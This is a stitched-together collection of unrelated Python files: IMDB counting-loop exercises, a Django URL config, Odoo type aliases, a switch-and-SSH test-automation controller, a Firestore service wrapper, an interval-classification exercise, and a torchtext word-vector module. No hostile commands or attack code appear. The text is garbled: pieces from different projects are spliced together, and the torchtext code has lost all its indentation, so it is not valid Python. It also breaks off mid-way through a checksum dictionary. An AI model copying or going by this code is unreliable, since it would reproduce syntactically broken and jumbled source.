# BONUS Challenge 1.8 - As you saw above, the "Stars" attribute of a movie is a
# list of strings. It contains the names of the actors/actresses in the movie.
# Write a loop that determines how many of the movies in this database "Tom Hanks"
# has acted in. Check your answer by looking at the actual database.
#
# Hint 1: Like in Challenge 1.5, you will have to loop over the list and have an
# if statement in the loop. But this time, your if statement wants to check
# whether the string "Tom Hanks" is in movieName's stars list.
#
# Hint 2: In Challenge 1.5, you had to keep one variable that keeps track of the
# highest rated movie you have seen so far. Similarly, in this question you
# will have to maintain one variable that keeps track of the number of Tom Hanks
# movies you have encountered so far in your loop.
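# A possible answer sketch for Challenge 1.8: the `in` operator checks
# membership in each movie's "Stars" list. The stand-in IMDBData below is
# hypothetical and only illustrates the list-of-strings structure.

```python
# Stand-in data (hypothetical; replace with the imported IMDBData).
IMDBData = {
    "Toy Story": {"Stars": ["Tom Hanks", "Tim Allen"]},
    "Cast Away": {"Stars": ["Tom Hanks", "Helen Hunt"]},
    "Zootopia": {"Stars": ["Ginnifer Goodwin", "Jason Bateman"]},
}

# Count movies whose Stars list contains "Tom Hanks".
tomHanksCount = 0
for movieName in IMDBData:
    if "Tom Hanks" in IMDBData[movieName]["Stars"]:
        tomHanksCount += 1
print("Tom Hanks appears in", tomHanksCount, "movies in the database")
```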
# BONUS Challenge 1.9 - In Challenge 1.8, you wrote code to determine the number
# of Tom Hanks movies in the database. Now, modify it so that you can type a name in,
# and it will tell you the number of movies by that actor/actress in the database.
# Check your answer by looking at the actual database.
#
# Hint: Remember input()?
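# A possible answer sketch for Challenge 1.9: wrapping the counting loop in a
# helper function (the name `countMoviesBy` is made up here) lets you reuse it
# for any actor/actress. The stand-in IMDBData is hypothetical; in the real
# exercise the name would come from input() instead of being hard-coded.

```python
# Stand-in data (hypothetical; replace with the imported IMDBData).
IMDBData = {
    "Toy Story": {"Stars": ["Tom Hanks", "Tim Allen"]},
    "Cast Away": {"Stars": ["Tom Hanks", "Helen Hunt"]},
}

def countMoviesBy(actorName):
    # Count how many movies list actorName among their Stars.
    count = 0
    for movieName in IMDBData:
        if actorName in IMDBData[movieName]["Stars"]:
            count += 1
    return count

# In the actual exercise the name would be read interactively, e.g.:
#   actorName = input("Enter an actor/actress name: ")
print("Tom Hanks has", countMoviesBy("Tom Hanks"), "movies in the database")
```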
# testproject/testapp/urls.py (shahabaz/quickstartup, MIT)
from django.urls import path
from .views import index

app_name = "app"

urlpatterns = [
    path("", index, name="index"),
]
# addons/po_persian_calendar/globals.py (apadanagroup/parOdoo, Apache-2.0)
from odoo import models, fields, api
from typing import TYPE_CHECKING, Any, List, Dict
import logging

# from .models.parnian_translation_branch import ParnianTranslationBranch

if TYPE_CHECKING:
    from odoo.addons.base.models.res_partner import Partner
    from odoo.addons.base.models.ir_http import IrHttp
    from odoo.addons.web.models.ir_http import Http
    from odoo.addons.base.models.res_users import Users
else:
    Partner = models.Model
    IrHttp = models.AbstractModel
    Http = models.AbstractModel
    Users = models.Model
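The file above imports the real odoo classes only under typing.TYPE_CHECKING and aliases them to generic base classes at runtime, so type checkers see precise types while runtime stays cheap. A self-contained sketch of the same pattern without the odoo dependency (module and class names here are illustrative):

```python
from typing import TYPE_CHECKING

class Model:
    """Stand-in for a framework base class."""

if TYPE_CHECKING:
    # Only evaluated by static type checkers (mypy, pyright),
    # so the real module never has to load at runtime.
    from some_framework.models import Partner  # hypothetical module
else:
    # At runtime the name still exists, bound to the generic base.
    Partner = Model

def greet(partner: "Partner") -> str:
    # The annotation satisfies the type checker; runtime just sees Model.
    return "hello"

print(greet(Model()))  # prints "hello"
```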
# Source Code/control panel/contorl.py (PerryLai/AutoTest-Platform, MIT)
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import sup
import os
import shutil
import time
### Config Setting ###
# Config file locations
ip_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\ip_config.ini'
fw_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\fw_config.ini'
switch_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\switch_config.ini'
control_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\control_config.ini'
testcase_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\testcase_config.ini'
# Files sent to the client for automated testing
main = sup.config_file(control_config, "Client", "main")
set_netns_net0 = sup.config_file(control_config, "Client", "set_netns_net0")
set_netns_net1 = sup.config_file(control_config, "Client", "set_netns_net1")
test_program_folder = sup.config_file(control_config, "Client", "test_program_folder")
test_program_path = sup.config_file(control_config, "Client", "test_program_path")
test_program = sup.config_file(control_config, "Client", "test_program")
packet_capture = sup.config_file(control_config, "Client", "packet_capture")
# Compression
zip_dir_srcPath = sup.config_file(control_config, "Control Panel", "zip_dir_srcPath")
zip_dir_dstname = sup.config_file(control_config, "Control Panel", "zip_dir_dstname")
# All data returned from the clients is collected in this folder
testcase_path = sup.config_file(control_config, "Control Panel", "testcase_path")
### Client address ###
main_client = sup.config_file(control_config, "Control Panel", "main_client")
source_code_client = sup.config_file(control_config, "Control Panel", "source_code_client")
### Server address ###
main_local = sup.config_file(control_config, "Control Panel", "main_local")
source_code_local = sup.config_file(control_config, "Control Panel", "source_code_local")
result_client = sup.config_file(control_config, "Control Panel", "result_client")  # /home/pi/Desktop/Result.zip
result_local = sup.config_file(control_config, "Control Panel", "result_local")  # D:\CN5SW1\Desktop\\Result
### Extraction paths ###
unzip_dir_srcName = sup.config_file(control_config, "Control Panel", "unzip_dir_srcName")
unzip_dir_dstPath = sup.config_file(control_config, "Control Panel", "unzip_dir_dstPath")
### External programs ###
analyze = sup.config_file(control_config, "Control Panel", "analyze")
cle = sup.config_file(control_config, "Control Panel", "cle")  # path to the program
# Initialize all testcase Result folders
testcase_file_num = len([name for name in os.listdir(testcase_path) if os.path.isdir(os.path.join(testcase_path, name))])
for i in range(1, testcase_file_num):
    Result_dir = "%s\\testcase\\Result%r" % (sup.config_file(control_config, "Control Panel", "AutoTest_Path"), i)
    if os.path.isdir(Result_dir):
        shutil.rmtree(Result_dir)
    os.mkdir(Result_dir)
ip_nums = len(sup.config_file_all_title(ip_config))
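The Result-folder initialization above deletes and recreates numbered folders on every run; a small reusable sketch of that pattern, guarded so a missing folder does not raise (the folder name and temp location here are illustrative):

```python
import os
import shutil
import tempfile

def reset_dir(path):
    """Delete `path` if it exists, then recreate it empty."""
    if os.path.isdir(path):
        shutil.rmtree(path)
    os.makedirs(path)

# Demonstrate inside a throwaway temp directory.
base = tempfile.mkdtemp()
target = os.path.join(base, "Result1")

reset_dir(target)  # works even though Result1 never existed
open(os.path.join(target, "old.txt"), "w").close()
reset_dir(target)  # wipes the stale file from the previous run
print(os.listdir(target))  # []
```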
# Main loop
for i in range(1, ip_nums + 1):
    print('i = %s' % i)
    ### IP setup ###
    sup.alter_ip_to_config(control_config, ip_config, i)  # ip_list.ini -> control_config
    sup.alter_config_to_set_netns_net0(control_config, set_netns_net0)  # copy config data into set_netns_net0
    sup.alter_config_to_set_netns_net1(control_config, set_netns_net1)  # copy config data into set_netns_net1
    sup.alter(test_program_path, 0, 0, control_config, "Client", "test_program")  # copy config data into test_program.txt
    # sup.alter(packet_capture, 30, 8, control_config, "Client", "packet_catch_num")  # copy the configured capture-packet count into packet_capture.sh
    # sup.alter(packet_capture, 29, 8, control_config, "Client", "packet_catch_num")  # copy the configured capture-packet count into packet_capture.sh
    # sup.alter("%s\\%s" % (test_program_folder, test_program), 6, 10, control_config, "Client", "packet_ping_num")  # copy the configured send-packet count into packet_transfer_program; be sure to update the arguments if this is modified
    ### Firmware setup ###
    sup.alter_fw_to_config(control_config, fw_config, i)  # fw_config.ini -> control_config.ini
    fw_bin = sup.config_file(control_config, "Firmware config", "Firmware_config")  # filename of the firmware under test
    sup.cle_set(cle, fw_bin)
    ### Switch ###
    sup.alter_sw_to_config(control_config, switch_config, i)  # sw_config.ini -> control_config.ini
    HOST = sup.config_file(control_config, "switch", "HOST")
    USER = sup.config_file(control_config, "switch", "USER")
    PASSWORD = sup.config_file(control_config, "switch", "PASSWORD")
    PORT = sup.config_file(control_config, "switch", "PORT")
    CP_normal = sup.config_file(control_config, "switch", "CP_normal")
    CP_fixed = sup.config_file(control_config, "switch", "CP_fixed")
    CP_forbidden = sup.config_file(control_config, "switch", "CP_forbidden")
    PC1_vlan = sup.config_file(control_config, "switch", "PC1_vlan")
    PC1_normal = sup.config_file(control_config, "switch", "PC1_normal")
    PC1_fixed = sup.config_file(control_config, "switch", "PC1_fixed")
    PC1_forbidden = sup.config_file(control_config, "switch", "PC1_forbidden")
    PC2_vlan = sup.config_file(control_config, "switch", "PC2_vlan")
    PC2_normal = sup.config_file(control_config, "switch", "PC2_normal")
    PC2_fixed = sup.config_file(control_config, "switch", "PC2_fixed")
    PC2_forbidden = sup.config_file(control_config, "switch", "PC2_forbidden")
    sup.switch_portset(HOST, USER, PASSWORD, PORT, '1', CP_normal, CP_fixed, CP_forbidden)  # the switch's default VLAN toward the CP is 1
    sup.switch_portset(HOST, USER, PASSWORD, PORT, PC1_vlan, PC1_normal, PC1_fixed, PC1_forbidden)
    sup.switch_portset(HOST, USER, PASSWORD, PORT, PC2_vlan, PC2_normal, PC2_fixed, PC2_forbidden)
    # Replace every hard-coded parameter with values read from the config, including set_netns.sh (a separate helper calls set_netns and patches its parameters)
    HOST_net0 = sup.config_file(control_config, "Control Panel", "HOST_net0")
    USER_net0 = sup.config_file(control_config, "Control Panel", "USER_net0")
    PASSWORD_net0 = sup.config_file(control_config, "Control Panel", "PASSWORD_net0")
    PORT_net0 = sup.config_file(control_config, "Control Panel", "PORT_net0")
    HOST_net1 = sup.config_file(control_config, "Control Panel", "HOST_net1")
    USER_net1 = sup.config_file(control_config, "Control Panel", "USER_net1")
    PASSWORD_net1 = sup.config_file(control_config, "Control Panel", "PASSWORD_net1")
    PORT_net1 = sup.config_file(control_config, "Control Panel", "PORT_net1")
    ### Compress the files to the target location ###
    sup.zip_dir(zip_dir_srcPath, zip_dir_dstname)
    ### Send the archive to the client and drive it with commands ###
    sup.paramiko_net0(HOST_net0, USER_net0, PASSWORD_net0, PORT_net0, source_code_local, source_code_client)
    sup.paramiko_net1(HOST_net1, USER_net1, PASSWORD_net1, PORT_net1, source_code_local, source_code_client)
    sup.paramiko_link(HOST_net0, USER_net0, PASSWORD_net0, PORT_net0, main_local, main_client, source_code_local, source_code_client, result_client, result_local, i)
    ### Extract the packet captures collected by the client ###
    sup.unzip_dir("%s\\Result%s.zip" % (sup.config_file(control_config, "Control Panel", "unzip_dir_srcName"), int(i / 2) + 1), "%s\\Result%s" % (sup.config_file(control_config, "Control Panel", "unzip_dir_dstPath"), int(i / 2) + 1))
    ### Invoke the analysis child process ###
    commandText = "python " + '"' + analyze + '"'
    os.system(commandText)
# src/service/firebase/firebaseService.py (CabraKill/HiHome-API, MIT)
from typing import Any, Callable, Generator
from google.cloud.firestore_v1.base_document import DocumentSnapshot
from google.cloud.firestore_v1.collection import CollectionReference
from src.service.firebase.models.documentAPIModel import DocumentFirebaseAPIModel
from src.service.firebase.models.documentEntity import DocumentFirebaseEntity
from src.service.firebase.Ifirebase import IFirebase
from google.cloud.firestore import Client
class FirebaseAPIService(IFirebase):
    def __init__(self, project_name: str):
        self.project_name = project_name
        super().__init__()

    def init(self):
        print("FirebaseService initiated.")
        self.db = Client(project=self.project_name)

    def getDb(self) -> Client:
        return self.db

    def getCollection(self, path: str) -> CollectionReference:
        collection = self.db.collection(path)
        return collection

    def getDocumentCollection(self, path: str) -> Generator[Any, Any, None]:
        documents = self.db.collection(path).list_documents()
        print(type(documents))
        return documents

    def getDocumentReference(self, path: str) -> DocumentFirebaseEntity:
        documentReference = self.db.document(path)
        return documentReference

    def getDocument(self, path: str) -> DocumentFirebaseEntity:
        documentReference = self.db.document(path)
        document = DocumentFirebaseAPIModel(
            documentReference=documentReference)
        return document

    def setActionForDocumentChange(self, path: str, function: Callable):
        document = self.db.document(path)  # .where(u'state', u'==', u'CA')
        query_watch = document.on_snapshot(function)
        return query_watch  # returned so callers can unsubscribe

    def updateDocument(self, house_name: str, id: str, document: DocumentFirebaseEntity):
        document_dict = document.toDict()
        print(document_dict)
        # self.db.collection(f'{house_name}/devices').add(document_dict)
# 1037 INTERVALO.py (castrolimoeiro/Uri-exercise, MIT)
# -*- coding: utf-8 -*-
valor = float(input())

if 0 < valor <= 25:
    print('Intervalo [0, 25]')
elif 25 < valor <= 50:
    print('Intervalo (25, 50]')
elif 50 < valor <= 75:
    print('Intervalo (50, 75]')
elif 75 < valor <= 100:
    print('Intervalo (75, 100]')
else:
    print('Fora de intervalo')
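The if/elif chain is the intended solution; as an aside, the same classification can be done against sorted upper bounds with the standard bisect module, which stays O(log n) as the number of intervals grows (an alternative sketch, not the exercise's required form):

```python
import bisect

def classify(valor):
    bounds = [25, 50, 75, 100]
    labels = ['Intervalo [0, 25]', 'Intervalo (25, 50]',
              'Intervalo (50, 75]', 'Intervalo (75, 100]']
    if 0 < valor <= 100:
        # bisect_left returns the index of the first bound >= valor,
        # which matches these half-open (lo, hi] intervals.
        return labels[bisect.bisect_left(bounds, valor)]
    return 'Fora de intervalo'

print(classify(25.0))   # Intervalo [0, 25]
print(classify(25.01))  # Intervalo (25, 50]
print(classify(-1.0))   # Fora de intervalo
```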
# torchtext/experimental/vectors.py (zacker150/text, BSD-3-Clause)
import logging
import torch
from torch import Tensor
import torch.nn as nn
from typing import List
from torchtext.utils import (
download_from_url,
extract_archive
)
from torchtext._torchtext import (
Vectors as VectorsPybind,
_load_token_and_vectors_from_file
)
__all__ = [
'FastText',
'GloVe',
'load_vectors_from_file_path',
'build_vectors',
'Vectors'
]
logger = logging.getLogger(__name__)
def FastText(language="en", unk_tensor=None, root=".data", validate_file=True, num_cpus=32):
r"""Create a FastText Vectors object.
Args:
language (str): the language to use for FastText. The list of supported languages options
can be found at https://fasttext.cc/docs/en/language-identification.html
unk_tensor (Tensor): a 1d tensor representing the vector associated with an unknown token
root (str): folder used to store downloaded files in. Default: '.data'.
validate_file (bool): flag to determine whether to validate the downloaded files checksum.
Should be `False` when running tests with a local asset.
num_cpus (int): the number of cpus to use when loading the vectors from file. Default: 32.
Returns:
Vectors: a Vectors object.
Raises:
ValueError: if duplicate tokens are found in FastText file.
"""
url = "https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.{}.vec".format(language)
checksum = None
if validate_file:
checksum = CHECKSUMS_FAST_TEXT.get(url, None)
downloaded_file_path = download_from_url(url, root=root, hash_value=checksum)
cpp_vectors_obj, dup_tokens = _load_token_and_vectors_from_file(downloaded_file_path, ' ', num_cpus, unk_tensor)
if dup_tokens:
raise ValueError("Found duplicate tokens in file: {}".format(str(dup_tokens)))
vectors_obj = Vectors(cpp_vectors_obj)
return vectors_obj
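download_from_url compares the downloaded file against the SHA-256 entries in CHECKSUMS_FAST_TEXT. That check boils down to hashing the file in chunks and comparing hex digests; a sketch with hashlib (the helper name and sample file are illustrative, not torchtext's actual implementation):

```python
import hashlib
import tempfile

def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large vector files never load fully into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# Create a small sample file and verify its digest against itself.
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"hello vectors")
    path = f.name

digest = sha256_of(path)
print(digest == sha256_of(path))  # True: hashing is deterministic
```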
def GloVe(name="840B", dim=300, unk_tensor=None, root=".data", validate_file=True, num_cpus=32):
r"""Create a GloVe Vectors object.
Args:
name (str): the name of the GloVe dataset to use. Options are:
- 42B
- 840B
- twitter.27B
- 6B
dim (int): the dimension for the GloVe dataset to load. Options are:
42B:
- 300
840B:
- 300
twitter.27B:
- 25
- 50
- 100
- 200
6B:
- 50
- 100
- 200
- 300
unk_tensor (Tensor): a 1d tensor representing the vector associated with an unknown token.
root (str): folder used to store downloaded files in. Default: '.data'.
validate_file (bool): flag to determine whether to validate the downloaded files checksum.
Should be `False` when running tests with a local asset.
num_cpus (int): the number of cpus to use when loading the vectors from file. Default: 32.
Returns:
Vectors: a Vectors object.
Raises:
ValueError: if unexpected duplicate tokens are found in GloVe file.
"""
dup_token_glove_840b = ["����������������������������������������������������������������������"
"����������������������������������������������������������������������"
"����������������������������������������������������������������������"
"����������������������������������������������������������������������"
"������������������������������������������������������"]
urls = {
"42B": "https://nlp.stanford.edu/data/glove.42B.300d.zip",
"840B": "https://nlp.stanford.edu/data/glove.840B.300d.zip",
"twitter.27B": "https://nlp.stanford.edu/data/glove.twitter.27B.zip",
"6B": "https://nlp.stanford.edu/data/glove.6B.zip",
}
valid_glove_file_names = {
"glove.42B.300d.txt",
"glove.840B.300d.txt",
"glove.twitter.27B.25d.txt",
"glove.twitter.27B.50d.txt",
"glove.twitter.27B.100d.txt",
"glove.twitter.27B.200d.txt",
"glove.6B.50d.txt",
"glove.6B.100d.txt",
"glove.6B.200d.txt",
"glove.6B.300d.txt"
}
file_name = "glove.{}.{}d.txt".format(name, str(dim))
if file_name not in valid_glove_file_names:
raise ValueError("Could not find GloVe file with name {}. Please check that `name` and `dim`"
"are valid.".format(str(file_name)))
url = urls[name]
checksum = None
if validate_file:
checksum = CHECKSUMS_GLOVE.get(url, None)
downloaded_file_path = download_from_url(url, root=root, hash_value=checksum)
extracted_file_paths = extract_archive(downloaded_file_path)
# need to get the full path to the correct file in the case when multiple files are extracted with different dims
extracted_file_path_with_correct_dim = [path for path in extracted_file_paths if file_name in path][0]
cpp_vectors_obj, dup_tokens = _load_token_and_vectors_from_file(extracted_file_path_with_correct_dim, ' ', num_cpus, unk_tensor)
# Ensure there is only 1 expected duplicate token present for 840B dataset
if dup_tokens and dup_tokens != dup_token_glove_840b:
raise ValueError("Found duplicate tokens in file: {}".format(str(dup_tokens)))
vectors_obj = Vectors(cpp_vectors_obj)
return vectors_obj
def load_vectors_from_file_path(filepath, delimiter=",", unk_tensor=None, num_cpus=10):
r"""Create a Vectors object from a csv file path.
Note that the tensor corresponding to each vector is of type `torch.float`.
Format for csv file:
token1<delimiter>num1 num2 num3
token2<delimiter>num4 num5 num6
...
token_n<delimiter>num_m num_j num_k
Args:
filepath: a file path to read data from.
delimiter (char): a character to delimit between the token and the vector. Default value is ","
unk_tensor (Tensor): a 1d tensor representing the vector associated with an unknown token.
num_cpus (int): the number of cpus to use when loading the vectors from file. Default: 10.
Returns:
Vectors: a Vectors object.
Raises:
ValueError: if duplicate tokens are found in the file.
"""
vectors_obj, dup_tokens = _load_token_and_vectors_from_file(filepath, delimiter, num_cpus, unk_tensor)
if dup_tokens:
raise ValueError("Found duplicate tokens in file: {}".format(str(dup_tokens)))
return Vectors(vectors_obj)
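The token<delimiter>num1 num2 ... format documented above can also be parsed in plain Python; this is a simplified sketch of the same format and duplicate check, not the multi-threaded C++ loader the function actually calls:

```python
def parse_vector_lines(lines, delimiter=","):
    """Parse `token<delimiter>num1 num2 ...` lines into a dict of float lists."""
    table = {}
    for line in lines:
        token, _, rest = line.rstrip("\n").partition(delimiter)
        if token in table:
            raise ValueError("Found duplicate token: {}".format(token))
        table[token] = [float(x) for x in rest.split()]
    return table

table = parse_vector_lines(["hot,0.1 0.2 0.3", "cold,0.4 0.5 0.6"])
print(table["hot"])  # [0.1, 0.2, 0.3]
```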
def build_vectors(tokens, vectors, unk_tensor=None):
r"""Factory method for creating a vectors object which maps tokens to vectors.
Args:
tokens (List[str]): a list of tokens.
vectors (torch.Tensor): a 2d tensor representing the vector associated with each token.
unk_tensor (torch.Tensor): a 1d tensors representing the vector associated with an unknown token.
Raises:
ValueError: if `vectors` is empty and a default `unk_tensor` isn't provided.
RuntimeError: if `tokens` and `vectors` have different sizes or `tokens` has duplicates.
TypeError: if all tensors within`vectors` are not of data type `torch.float`.
"""
if unk_tensor is None and (vectors is None or not len(vectors)):
raise ValueError("The vectors list is empty and a default unk_tensor wasn't provided.")
if not vectors.dtype == torch.float:
raise TypeError("`vectors` should be of data type `torch.float`.")
indices = [i for i in range(len(tokens))]
unk_tensor = unk_tensor if unk_tensor is not None else torch.zeros(vectors[0].size(), dtype=torch.float)
return Vectors(VectorsPybind(tokens, indices, vectors, unk_tensor))
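The lookup contract that build_vectors establishes (a known token maps to its row, anything else falls back to unk_tensor, and tokens/vectors must line up) can be mimicked without torch; a pure-Python sketch of that behavior, not the real C++-backed Vectors class:

```python
class TinyVectors:
    """Dict-backed stand-in for a token->vector lookup with an unk fallback."""

    def __init__(self, tokens, vectors, unk_vector):
        if len(tokens) != len(vectors):
            raise RuntimeError("tokens and vectors must have the same length")
        self.stoi = {tok: i for i, tok in enumerate(tokens)}
        self.vectors = vectors
        self.unk_vector = unk_vector

    def __getitem__(self, token):
        idx = self.stoi.get(token)
        return self.vectors[idx] if idx is not None else self.unk_vector

    def lookup_vectors(self, tokens):
        return [self[t] for t in tokens]

vec = TinyVectors(["a", "b"], [[1.0, 0.0], [0.0, 1.0]], unk_vector=[0.0, 0.0])
print(vec["a"])        # [1.0, 0.0]
print(vec["missing"])  # [0.0, 0.0] -- the unk fallback
```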
class Vectors(nn.Module):
__jit_unused_properties__ = ["is_jitable"]
r"""Creates a vectors object which maps tokens to vectors.
Args:
vectors (torch.classes.torchtext.Vectors or torchtext._torchtext.Vectors): a cpp vectors object.
"""
def __init__(self, vectors):
super(Vectors, self).__init__()
self.vectors = vectors
@property
def is_jitable(self):
return not isinstance(self.vectors, VectorsPybind)
@torch.jit.export
def forward(self, tokens: List[str]) -> Tensor:
r"""Calls the `lookup_vectors` method
Args:
tokens: a list of string tokens
Returns:
vectors (Tensor): returns a 2-D tensor of shape=(len(tokens), vector_dim) or an
empty tensor if `tokens` is empty
"""
return self.vectors.lookup_vectors(tokens)
@torch.jit.export
def __getitem__(self, token: str) -> Tensor:
r"""
Args:
token (str): the token used to lookup the corresponding vector.
Returns:
vector (Tensor): a tensor (the vector) corresponding to the associated token.
"""
return self.vectors[token]
@torch.jit.export
def __setitem__(self, token: str, vector: Tensor) -> None:
r"""
Args:
token (str): the token used to lookup the corresponding vector.
vector (Tensor): a 1d tensor representing a vector associated with the token.
Raises:
TypeError: if `vector` is not of data type `torch.float`.
"""
if vector.dtype != torch.float:
raise TypeError("`vector` should be of data type `torch.float` but it's of type " + str(vector.dtype))
self.vectors[token] = vector.float()
@torch.jit.export
def __len__(self) -> int:
r"""Get length of vectors object.
Returns:
length (int): the length of the vectors.
"""
return len(self.vectors)
@torch.jit.export
def lookup_vectors(self, tokens: List[str]) -> Tensor:
"""Look up embedding vectors for a list of tokens.
Args:
tokens: a list of tokens
Returns:
vectors (Tensor): returns a 2-D tensor of shape=(len(tokens), vector_dim) or an empty tensor if `tokens` is empty
Examples:
>>> examples = ['chip', 'baby', 'Beautiful']
>>> vec = text.vocab.GloVe(name='6B', dim=50)
>>> ret = vec.get_vectors_by_tokens(tokens)
"""
if not len(tokens):
return torch.empty(0, 0)
return self.vectors.lookup_vectors(tokens)
def to_ivalue(self):
r"""Return a JITable Vectors.
"""
stoi = self.vectors.get_stoi()
cpp_vectors = torch.classes.torchtext.Vectors(list(stoi.keys()), list(stoi.values()), self.vectors.vectors_, self.vectors.unk_tensor_)
return(Vectors(cpp_vectors))
CHECKSUMS_GLOVE = {
"https://nlp.stanford.edu/data/glove.42B.300d.zip":
"03d5d7fa28e58762ace4b85fb71fe86a345ef0b5ff39f5390c14869da0fc1970",
"https://nlp.stanford.edu/data/glove.840B.300d.zip":
"c06db255e65095393609f19a4cfca20bf3a71e20cc53e892aafa490347e3849f",
"https://nlp.stanford.edu/data/glove.twitter.27B.zip":
"792af52f795d1a32c9842a3240f5f3fe5e941a8ff6df5eb0f9d668092ebc019c",
"https://nlp.stanford.edu/data/glove.6B.zip":
"617afb2fe6cbd085c235baf7a465b96f4112bd7f7ccb2b2cbd649fed9cbcf2fb"
}
CHECKSUMS_FAST_TEXT = {
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.am.vec":
"b532c57a74628fb110b48b9d8ae2464eb971df2ecc43b89c2eb92803b8ac92bf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.als.vec":
"056a359a2651a211817dbb7885ea3e6f69e0d6048d7985eab173858c59ee1adf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.af.vec":
"87ecbfea969eb707eab72a7156b4318d341c0652e6e5c15c21bc08f5cf458644",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.an.vec":
"57db91d8c307c45613092ebfd405061ccfdec5905035d9a8ad364f6b8ce41b29",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ar.vec":
"5527041ce04fa66e45e27d7bd278f00425d97fde8c67755392d70f112fecc356",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.arz.vec":
"0b6c261fd179e5d030f2b363f9f7a4db0a52e6241a910b39fb3332d39bcfbec3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.as.vec":
"4475daa38bc1e8501e54dfcd79a1a58bb0771b347ad9092ce9e57e9ddfdd3b07",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.av.vec":
"1292eed7f649687403fac18e0ee97202e163f9ab50f6efa885aa2db9760a967e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ast.vec":
"fbba958174ced32fde2593f628c3cf4f00d53cd1d502612a34e180a0d13ce037",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.be.vec":
"3b36ba86f5b76c40dabe1c7fc3214338d53ce7347c28bb2fba92b6acc098c6ad",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.az.vec":
"93ebe624677a1bfbb57de001d373e111ef9191cd3186f42cad5d52886b8c6467",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ba.vec":
"b739fd6f9fe57205314d67a7975a2fc387b55679399a6b2bda0d1835b1fdd5a8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.azb.vec":
"05709ce8abc91115777f3cc2574d24d9439d3f6905500163295d695d41260a06",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bar.vec":
"3f58304eb0345d96c0abbffb61621c1f6ec2ca39e13272b434cc6cc2bde052a1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bcl.vec":
"309bb74a85647ac3a5be53fd9d3be3196cff385d257561f4183a0d91a67f0c8b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bg.vec":
"16f1a02f3b708f2cbc04971258b0febdfc9ed4e64fcc3818cc6a397e3db5cf81",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bh.vec":
"ab0819c155fd1609393f8af74794de8d5b49db0787edf136e938ea2c87993ab5",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bn.vec":
"3dd27b9b271c203a452de1c533fdf975ebec121f17f945ef234370358db2bae6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bpy.vec":
"2ba9f046d70bdaae2cbd9d33f9a1d2913637c00126588cc3223ba58ca80d49fe",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bo.vec":
"c5ed2a28edf39bc100f4200cdf1c9d3c1448efefcb3d78db8becea613a2fb2eb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.br.vec":
"fe858e2be787351cce96c206a9034c361e45f8b9e0a385aacfce3c73f844e923",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.da.vec":
"397b0c3e18f710fb8aa1caf86441a25af2f247335e8560dbe949feb3613ef5cc",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bs.vec":
"ee065fe168c0a4f1a0b9fbd8854be4572c138a414fd7200381d0135ce6c03b49",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bxr.vec":
"0bc0e47a669aa0d9ad1c665593f7257c4b27a4e3becce457a7348da716bdabb4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ca.vec":
"1600696088c7f2fe555eb6a4548f427f969a450ed0313d68e859d6024242db5f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cbk.vec":
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ceb.vec":
"7fbe4474043e4f656eb2f81ee03d1e863cef8e62ad4e3bd9a3a4143785752568",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ce.vec":
"2a321e2de98d0abb5a12599d9567dd5ac93f9e2599251237026acff35f23cef8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cs.vec":
"0eba2ac0852b1057909d4e8e5e3fa75470f9cb9408b364433ac4747eb2b568a9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cv.vec":
"67f09d353f2561b16c385187789eb6ff43fa125d3cc81081b2bc7d062c9f0b8a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cy.vec":
"1023affdcb7e84dd59b1b7de892f65888b6403e2ed4fd77cb836face1c70ee68",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.co.vec":
"7f16f06c19c8528dc48a0997f67bf5f0d79da2d817247776741b54617b6053d9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ckb.vec":
"ef3a8472cc2ac86976a1a91cde3edc7fcd1d1affd3c6fb6441451e9fbc6c3ae8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.de.vec":
